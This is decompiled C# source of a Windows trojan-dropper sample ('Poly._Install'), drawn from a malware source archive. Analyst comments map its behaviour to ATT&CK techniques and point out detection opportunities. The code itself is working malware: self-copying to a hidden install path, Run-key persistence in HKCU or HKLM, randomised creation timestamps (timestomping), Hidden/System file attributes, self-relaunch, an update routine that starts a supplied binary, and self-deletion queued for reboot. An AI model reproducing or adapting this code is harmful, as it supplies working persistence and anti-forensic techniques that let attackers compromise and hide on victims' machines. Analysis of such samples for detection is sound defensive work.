MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc/_Install.cs

// Decompiled with JetBrains decompiler
// Type: Poly._Install
// Assembly: Poly, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Threading;
namespace Poly
{
// ANALYST NOTES (defensive review of a decompiled sample; code below is unchanged).
// _Install is the installation / persistence / self-removal component of this sample.
// It relies on static state and helpers declared elsewhere (Base_Settings.wait, filePath,
// fileName, regName, isAdmin, status, busy, isExePath(), cleanUp(); API.MoveFileEx;
// _communicate), none of which are visible in this file, so their exact values and
// semantics must be confirmed against those types.
// Behaviours visible here, with the ATT&CK techniques they correspond to:
//   - Run-key autostart in HKCU or HKLM (T1547.001)
//   - Randomised creation timestamp on the dropped file (T1070.006)
//   - Hidden/System/ReadOnly attributes on the install directory and file (T1564.001)
//   - Self-relocation to %TEMP% and delete-on-reboot during uninstall (T1070.004)
// The Console.WriteLine literals are embedded in the binary as plain strings and are
// usable as static signature material.
internal class _Install : Base_Settings
{
/// <summary>
/// Entry point for this module: runs Install() immediately when Base_Settings.wait is
/// false, otherwise polls the flag every 5 seconds and installs once it is cleared.
/// </summary>
public override void Initialise()
{
if (!Base_Settings.wait)
{
Console.WriteLine("Install called...");
this.Install();
}
else
{
// Polling loop: blocks this thread until some other code clears the flag.
while (Base_Settings.wait)
{
Console.WriteLine("Sleeping just in time...");
Thread.Sleep(5000);
}
// Re-check after the loop; skips installation if the flag was set again in between.
if (Base_Settings.wait)
return;
Console.WriteLine("Installing");
this.Install();
}
}
/// <summary>Empty override; this module does nothing in Run().</summary>
public override void Run()
{
}
/// <summary>
/// Drops the binary and writes the autostart values. When isExePath() is false it then
/// launches the dropped copy and kills the current process; otherwise it only records
/// the status string.
/// </summary>
private void Install()
{
// NOTE(review): isExePath() is defined elsewhere; presumably it reports whether the
// process is already running from the install location - confirm in Base_Settings.
if (!Base_Settings.isExePath())
{
Console.WriteLine("Copying to specified disk location");
this.Drop();
this.WriteRegistry();
Console.WriteLine("Successfully copied. Attempting to start process");
// Detection point: a process starts an image at filePath + fileName and the parent
// terminates itself right after, so the child is orphaned almost immediately.
Process.Start(Base_Settings.filePath + Base_Settings.fileName);
Process.GetCurrentProcess().Kill();
}
else
{
// Drop() and WriteRegistry() are repeated on every start from this branch, so the
// autostart value is rewritten if it was removed while the file itself was left in place.
this.Drop();
this.WriteRegistry();
Base_Settings.status = "Installed!";
}
}
/// <summary>
/// Places the running image at filePath + fileName, then alters the creation time and
/// file attributes of the result. Every step is wrapped in its own try/catch, so a
/// failure in one step does not stop the following ones.
/// </summary>
private void Drop()
{
Console.WriteLine("Install Path is " + Base_Settings.filePath);
try
{
if (!Directory.Exists(Base_Settings.filePath))
Directory.CreateDirectory(Base_Settings.filePath);
}
catch (Exception ex)
{
// This message is printed only when directory creation itself failed.
Console.WriteLine("Directory Not Found... Creating new one at" + Base_Settings.filePath + "\n" + ex.ToString());
}
try
{
// Path is built by plain concatenation here (Path.Combine is used further down),
// so filePath is presumably stored with a trailing separator - confirm.
string str = Base_Settings.filePath + Base_Settings.fileName;
Console.WriteLine("Moving to {0}", (object) str);
// First attempt is a move of the running image (API.MoveFileEx is a wrapper declared
// elsewhere); if that returns false the image is copied instead, overwriting any
// existing file. After a successful move the original launch path no longer holds the file.
if (!API.MoveFileEx(Process.GetCurrentProcess().MainModule.FileName, str, API.MoveFileFlags.MOVEFILE_REPLACE_EXISTING))
File.Copy(Process.GetCurrentProcess().MainModule.FileName, str, true);
Console.WriteLine("File successfully moved to {0}", (object) (Base_Settings.filePath + Base_Settings.fileName));
}
catch (Exception ex)
{
Console.WriteLine("Could Not copy file to specified folder\n" + ex.ToString());
}
try
{
// Timestomping: the creation time of the dropped file is replaced with a random date.
// Random.Next excludes its upper bound, so the result is day 1-27, month 1-11 and a
// year from 2000 up to last year, always at 00:00:00. Forensics: do not trust this
// file's creation time; a midnight creation time that disagrees with other records
// (for example MFT $FILE_NAME timestamps or the USN journal) is a hunting indicator.
Random random = new Random();
int day = random.Next(1, 28);
int month = random.Next(1, 12);
int year = random.Next(2000, DateTime.Now.Year);
Directory.SetCreationTime(Base_Settings.filePath + Base_Settings.fileName, new DateTime(year, month, day));
}
catch
{
}
try
{
// Install directory is marked ReadOnly + Hidden + NotContentIndexed.
File.SetAttributes(Base_Settings.filePath, FileAttributes.ReadOnly | FileAttributes.Hidden | FileAttributes.NotContentIndexed);
}
catch
{
}
try
{
// Dropped file is marked Hidden + System + NotContentIndexed, which hides it from
// default Explorer views; enumerate with hidden and system files shown when triaging.
File.SetAttributes(Path.Combine(Base_Settings.filePath, Base_Settings.fileName), FileAttributes.Hidden | FileAttributes.System | FileAttributes.NotContentIndexed);
}
catch
{
}
}
/// <summary>
/// Writes the autostart registry values. Value name is Base_Settings.regName and the
/// data is the full path of the dropped file. All failures are silently ignored.
/// </summary>
public void WriteRegistry()
{
try
{
// Run-key persistence: HKCU\...\Run without admin rights, HKLM\...\Run with them.
// Detection point: registry-set events on either Run key whose data points at a
// hidden file.
if (!Base_Settings.isAdmin)
Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run").SetValue(Base_Settings.regName, (object) Path.Combine(Base_Settings.filePath, Base_Settings.fileName));
else
Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run").SetValue(Base_Settings.regName, (object) Path.Combine(Base_Settings.filePath, Base_Settings.fileName));
}
catch
{
}
try
{
if (!Base_Settings.isAdmin)
return;
// As decompiled, this value is created under the CurrentUser hive, i.e. at
// HKCU\SYSTEM\CurrentControlSet\Services. That subkey is unusual in a user hive,
// so its presence is a host artefact worth checking during triage.
Registry.CurrentUser.CreateSubKey("SYSTEM\\CurrentControlSet\\Services").SetValue(Base_Settings.regName, (object) Path.Combine(Base_Settings.filePath, Base_Settings.fileName));
}
catch
{
}
}
/// <summary>
/// Removal routine: deletes the Run value, attempts to delete the dropped file, queues
/// the running image for deletion, then waits 10 seconds and calls Base_Settings.cleanUp().
/// Note that the value written under HKCU\SYSTEM\CurrentControlSet\Services by
/// WriteRegistry() is not removed here.
/// </summary>
public static void Uninstall()
{
try
{
Base_Settings.status = "Removing";
// CreateSubKey is used to open the key, so the key is created if it was missing.
if (!Base_Settings.isAdmin)
Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run").DeleteValue(Base_Settings.regName);
else
Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run").DeleteValue(Base_Settings.regName);
// Path.GetTempFileName() creates a zero-byte file in the temp directory. Any exception
// from here on is swallowed by the catch below, so responders may find leftover
// tmp*.tmp files and should not assume the dropped file was actually deleted.
string tempFileName = Path.GetTempFileName();
File.Copy(Process.GetCurrentProcess().MainModule.FileName, tempFileName);
File.Delete(Base_Settings.filePath + Base_Settings.fileName);
}
catch
{
}
_Install.QueueForDeletion();
Base_Settings.busy = false;
Thread.Sleep(10000);
// cleanUp() is defined elsewhere; its effect cannot be determined from this file.
Base_Settings.cleanUp();
}
/// <summary>
/// Starts Uninstall() on a background thread, reports status through _communicate, and
/// launches the executable at the supplied path.
/// </summary>
/// <param name="Path">Path of the file to start. NOTE(review): the caller is not visible
/// here; presumably this is a replacement binary received from the operator - confirm.
/// Inside this method the parameter name hides System.IO.Path.</param>
public static void Update(string Path)
{
new Thread(new ThreadStart(_Install.Uninstall)).Start();
Base_Settings.status = "Updated";
_communicate.setReturn(1);
_communicate.forceTalk();
// Detection point: this process spawns a new image while its own removal is in progress.
Process.Start(Path);
}
/// <summary>
/// Moves the running image to a temp-file path, deletes the install directory, and asks
/// the OS to delete the moved image at the next reboot.
/// </summary>
private static void QueueForDeletion()
{
try
{
// Reserve a unique temp name, remove the placeholder, then move the running image there.
string tempFileName = Path.GetTempFileName();
File.Delete(tempFileName);
File.Move(Process.GetCurrentProcess().MainModule.FileName, tempFileName);
try
{
// Recursive delete of the whole install directory; failure is ignored.
Directory.Delete(Base_Settings.filePath, true);
}
catch
{
}
// Null destination + MOVEFILE_DELAY_UNTIL_REBOOT requests deletion at next boot.
// Forensics: until that reboot the executable remains in the temp directory under a
// .tmp name, and Windows records pending operations of this kind in the
// PendingFileRenameOperations value under
// HKLM\SYSTEM\CurrentControlSet\Control\Session Manager. The return value is not checked.
API.MoveFileEx(tempFileName, (string) null, API.MoveFileFlags.MOVEFILE_DELAY_UNTIL_REBOOT);
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
}
}
}